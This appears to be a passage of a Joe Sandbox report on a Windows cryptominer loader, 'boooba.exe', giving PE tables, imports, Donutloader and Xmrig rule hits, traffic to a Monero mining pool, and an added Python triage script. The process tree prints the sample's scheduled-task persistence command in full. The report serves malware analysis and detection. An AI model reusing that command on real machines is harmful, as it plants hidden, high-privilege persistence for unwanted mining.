                                                                dec ecx
                                                                mov eax, edx
                                                                dec ecx
                                                                mov ebx, ecx
                                                                dec eax
                                                                mov eax, dword ptr [ebp-10h]
                                                                dec ecx
                                                                mov edx, eax
                                                                dec esp
                                                                mov ecx, edx
                                                                dec esp
                                                                mov edx, ebx
                                                                call 00007FC94455F5A9h
                                                                dec eax
                                                                mov eax, dword ptr [002205E1h]
                                                                dec eax
                                                                mov ecx, dword ptr [002205E2h]
                                                                dec eax
                                                                mov edx, dword ptr [002205E3h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x222930 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x224000 | 0x90 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x22296c | 0x90 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x14e0 | 0x1600 | 88ad8c1be7e0f7eea949d01b2fe82d44 | False | 0.32759232954545453 | data | 5.398132007868387 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3000 | 0x21fb6e | 0x21fc00 | b89fdc0ff2350f4568e5bd4e254e9eba | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss | 0x223000 | 0xfac | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x224000 | 0x90 | 0x200 | 833d670d56c423f97067d7571a397b78 | False | 0.17578125 | data | 1.2087156271204966 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
DLL | Import
msvcrt.dll | malloc, memset, _get_pgmptr, getenv, sprintf, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
kernel32.dll | Sleep, CreateProcessA, SetUnhandledExceptionFilter
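The static tables above give the numbers a reviewer uses to read this file without running it: a 2,234,368-byte PE32+ whose entrypoint 0x4022fa sits in a 0x1600-byte .text, whose .rdata holds almost the whole file at entropy close to 8.0, and whose only imports are a C-runtime startup set plus Sleep and CreateProcessA. The Python below is an added worked example (not Joe Sandbox code and not the sample's): it maps the entrypoint RVA into the section table, computes an import hash by the pefile/VirusTotal algorithm over the listed imports, and computes the 8-bit Shannon entropy the report prints per section. Section values, sizes and the import list are transcribed from the tables above; the assumption that the listed import order equals the IAT order is mine, and ordinal-only imports are not handled, so compare the computed hash with the report's Import Hash rather than trusting it blindly.

```python
import hashlib
import math

# Transcribed from the report's section table: name, virtual address (RVA),
# virtual size, raw size.
SECTIONS = [
    (".text",  0x1000,   0x14e0,   0x1600),
    (".rdata", 0x3000,   0x21fb6e, 0x21fc00),
    (".bss",   0x223000, 0xfac,    0x0),
    (".pdata", 0x224000, 0x90,     0x200),
]
IMAGE_BASE = 0x400000
ENTRYPOINT_VA = 0x4022fa          # the report prints the entrypoint rebased to ImageBase
FILE_SIZE = 2234368
FILE_ENTROPY = 7.999661300763701

# Imports as listed in the report; listed order is ASSUMED to be IAT order.
IMPORTS = [
    ("msvcrt.dll", ["malloc", "memset", "_get_pgmptr", "getenv", "sprintf", "__argc",
                    "__argv", "_environ", "_XcptFilter", "__set_app_type", "_controlfp",
                    "__getmainargs", "exit"]),
    ("kernel32.dll", ["Sleep", "CreateProcessA", "SetUnhandledExceptionFilter"]),
]


def section_for_rva(rva, sections=SECTIONS):
    """Name of the section whose range [VA, VA + VirtualSize) covers rva, else None."""
    for name, va, vsize, _raw in sections:
        if va <= rva < va + vsize:
            return name
    return None


def entrypoint_section(entry_va=ENTRYPOINT_VA, image_base=IMAGE_BASE, sections=SECTIONS):
    """AddressOfEntryPoint is an RVA, so subtract ImageBase before the lookup."""
    return section_for_rva(entry_va - image_base, sections)


def imphash(imports):
    """Import hash as pefile/VirusTotal compute it: 'dll.func' pairs, lower-cased,
    DLL extension stripped, joined with commas in IAT order, then MD5.
    Ordinal-only imports are not handled here (pefile maps known ordinals to names)."""
    parts = []
    for dll, funcs in imports:
        dll = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if dll.endswith(ext):
                dll = dll[:-len(ext)]
                break
        parts.extend(f"{dll}.{func.lower()}" for func in funcs)
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte: 0.0 for empty input (the report's
    'empty' .bss row) and 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def triage(sections=SECTIONS, file_size=FILE_SIZE, entropy=FILE_ENTROPY):
    """The conclusions a reviewer draws from the static table alone."""
    flags = []
    if entropy > 7.9:
        flags.append("whole-file entropy close to 8.0: contents compressed or encrypted")
    for name, _va, _vsize, raw in sections:
        if raw > 0.9 * file_size:
            flags.append(f"{name} is {raw / file_size:.1%} of the file: embedded payload, not code")
    ep = entrypoint_section(sections=sections)
    raw_text = next(raw for name, _va, _vsize, raw in sections if name == ep)
    flags.append(f"entrypoint in {ep} ({raw_text:#x} raw bytes): a small native stub")
    return flags
```

Run the file and print triage() to see the three flags; feed real section bytes from a parsed PE into shannon_entropy() to reproduce the per-section Entropy column.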
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-30T11:42:02.084648+0100 | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 2 | 192.168.2.4 | 49731 | 212.47.253.124 | 10300 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 11:42:10.645478964 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:10.650799990 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:10.650875092 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:10.651052952 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:10.656302929 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:10.854851961 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:10.860342979 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:10.860415936 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:10.860496998 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:10.865865946 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:11.470175982 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:11.522156000 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:11.695657015 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:11.740885973 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:17.592417955 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:17.693147898 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:17.756544113 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:17.772172928 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:27.434385061 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:27.647247076 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:27.867705107 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:28.093019009 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:28.093246937 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:37.532932997 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:37.647228003 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:37.880022049 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:37.975353956 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:47.432581902 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:47.647270918 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:42:47.685528994 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:42:47.881653070 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:43:00.559580088 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:43:00.647356987 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:43:00.688911915 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:43:00.772289038 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:43:09.518081903 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:43:09.647301912 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:43:10.668694973 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:43:10.787911892 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:43:20.488769054 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:43:20.647335052 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:43:20.669874907 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:43:20.772357941 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:43:29.516242027 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:43:29.647351980 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:43:30.916131973 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:43:31.084836960 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:43:40.519223928 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:43:40.647470951 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:43:40.650868893 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:43:40.881767035 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:43:50.484646082 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:43:50.647427082 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:43:50.791806936 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:43:50.975529909 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:44:00.516897917 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:44:00.647448063 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:44:00.840754032 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:44:00.881789923 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:44:09.475711107 CET | 10300 | 49730 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:44:09.584939003 CET | 49730 | 10300 | 192.168.2.4 | 212.47.253.124
Oct 30, 2024 11:44:10.243458986 CET | 10300 | 49731 | 212.47.253.124 | 192.168.2.4
Oct 30, 2024 11:44:10.459959984 CET | 49731 | 10300 | 192.168.2.4 | 212.47.253.124
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 11:42:10.630589008 CET | 63090 | 53 | 192.168.2.4 | 1.1.1.1
Oct 30, 2024 11:42:10.641957045 CET | 53 | 63090 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 30, 2024 11:42:10.630589008 CET | 192.168.2.4 | 1.1.1.1 | 0x6cf7 | Standard query (0) | xmr-eu1.nanopool.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 30, 2024 11:42:10.641957045 CET | 1.1.1.1 | 192.168.2.4 | 0x6cf7 | No error (0) | xmr-eu1.nanopool.org | | 51.15.58.224 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 11:42:10.641957045 CET | 1.1.1.1 | 192.168.2.4 | 0x6cf7 | No error (0) | xmr-eu1.nanopool.org | | 51.15.193.130 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 11:42:10.641957045 CET | 1.1.1.1 | 192.168.2.4 | 0x6cf7 | No error (0) | xmr-eu1.nanopool.org | | 51.89.23.91 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 11:42:10.641957045 CET | 1.1.1.1 | 192.168.2.4 | 0x6cf7 | No error (0) | xmr-eu1.nanopool.org | | 146.59.154.106 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 11:42:10.641957045 CET | 1.1.1.1 | 192.168.2.4 | 0x6cf7 | No error (0) | xmr-eu1.nanopool.org | | 54.37.232.103 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 11:42:10.641957045 CET | 1.1.1.1 | 192.168.2.4 | 0x6cf7 | No error (0) | xmr-eu1.nanopool.org | | 163.172.154.142 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 11:42:10.641957045 CET | 1.1.1.1 | 192.168.2.4 | 0x6cf7 | No error (0) | xmr-eu1.nanopool.org | | 212.47.253.124 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 11:42:10.641957045 CET | 1.1.1.1 | 192.168.2.4 | 0x6cf7 | No error (0) | xmr-eu1.nanopool.org | | 51.15.65.182 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 11:42:10.641957045 CET | 1.1.1.1 | 192.168.2.4 | 0x6cf7 | No error (0) | xmr-eu1.nanopool.org | | 54.37.137.114 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 11:42:10.641957045 CET | 1.1.1.1 | 192.168.2.4 | 0x6cf7 | No error (0) | xmr-eu1.nanopool.org | | 141.94.23.83 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 11:42:10.641957045 CET | 1.1.1.1 | 192.168.2.4 | 0x6cf7 | No error (0) | xmr-eu1.nanopool.org | | 162.19.224.121 | A (IP address) | IN (0x0001) | false


Target ID: 0
Start time: 06:41:56
Start date: 30/10/2024
Path: C:\Users\user\Desktop\boooba.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\boooba.exe"
Imagebase: 0x400000
File size: 2'234'368 bytes
MD5 hash: EF9E6A4BAB77A1E5ED51669EABEBA31D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 1
Start time: 06:41:59
Start date: 30/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: true

Target ID: 2
Start time: 06:42:00
Start date: 30/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
Imagebase: 0x7ff746900000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 06:42:00
Start date: 30/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 06:42:00
Start date: 30/10/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 06:42:02
Start date: 30/10/2024
Path: C:\Users\user\IOAshdohSha.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\IOAshdohSha.exe
Imagebase: 0x400000
File size: 2'234'368 bytes
MD5 hash: EF9E6A4BAB77A1E5ED51669EABEBA31D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 71%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 6
Start time: 06:42:03
Start date: 30/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"
Imagebase: 0x7ff746900000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 06:42:03
Start date: 30/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 06:42:03
Start date: 30/10/2024
Path: C:\Users\user\IOAshdohSha.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\IOAshdohSha.exe
Imagebase: 0x400000
File size: 2'234'368 bytes
MD5 hash: EF9E6A4BAB77A1E5ED51669EABEBA31D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 9
Start time: 06:42:05
Start date: 30/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
